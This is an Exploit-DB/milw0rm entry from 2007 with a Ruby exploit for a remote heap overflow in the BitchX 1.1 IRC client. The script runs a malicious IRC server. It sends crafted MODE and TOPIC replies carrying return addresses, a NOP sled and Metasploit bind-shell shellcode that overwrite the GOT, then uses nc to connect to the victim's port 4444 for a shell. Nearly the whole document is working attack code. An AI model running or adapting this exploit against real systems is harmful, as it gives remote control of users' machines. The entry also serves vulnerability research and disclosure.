BitchX 1.1 Final - MODE Remote Heap Overflow

EDB-ID:

4321

Author:

bannedit

Type:

remote

Platform:

Linux

Published:

2007-08-27

#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################

require 'socket'

#the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }

shellcode = #fork before binding a shell provides a clean exit
            "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+

             #metasploit linux x86 shellcode bind tcp port 4444
            "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+
            "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+
            "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+
            "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+
            "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+
            "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+
            "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"
           

port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)

ret = (targets['linux 2.6 Hardened (FC6)'].hex)

puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit                                -"
puts "----------------------------------------------"


puts "\n[-] listening for incoming clients..."

while (client = sock.accept)
   ip = client.peeraddr

   buffer = client.gets
   puts "[<] #{buffer}"
  
   hostname = ([ret].pack('V')) * 13
   nick = "bannedit"

   #Fake server reply to connection
   buffer = ":#{nick} MODE #{nick} :+iw\r\n"+
            ":0 001 #{nick} :biznitch-1.0\r\n"+
            ":5 002 #{nick} :biznitch-1.0\r\n"+
            ":6 003 #{nick} :a\r\n"+
            ":aaa 004 #{nick} :a\r\n"+
            ":aaa 005 #{nick} :a\r\n"+
            ":aaa 251 #{nick} :a\r\n"+
            ":aaa 252 #{nick} :a\r\n"+
            ":aaa 253 #{nick} :a\r\n"+
            ":aaa 254 #{nick} :a\r\n"+
            ":aaa 255 #{nick} :a\r\n"+
            ":aaa 375 #{nick} :a\r\n"+
            ":aaa 372 #{nick} :a\r\n"+
            ":aaa 376 #{nick} :a\r\n"
           
   join =   ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+      
            ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"

   puts "[>] sending fake server response"
   client.send(buffer, 0)
   sleep(2)
#   client.send(join, 0)

   topic =  ":aaa TOPIC #hackers:"
   ret = ret + 0x200
   topic<<  ([ret].pack('V')) * 100
   topic<< "\r\n"
   for i in 0..20
   client.send(topic, 0)
   end

   puts "[>] sending evil buffer"
   evilbuf = ":#{hostname}  MODE "
   evilbuf<< "#{nick} :aaa"
   ret = ret + 0x200
   evilbuf<< ([ret].pack('V')) * 200
   evilbuf<< "\x90" * (1126 - shellcode.length)
   evilbuf<< shellcode
   evilbuf<< "\x90" * 40
   evilbuf<< "\r\n"
  
   for i in 0..5
      client.send(evilbuf, 0)
   end

sleep(10) #wait for the shellcode to do its thing...

puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"

   fork {
           system("nc #{ip[3]} 4444")
           puts "[+] exiting shell dropping back to listener"
        }
end

# milw0rm.com [2007-08-27]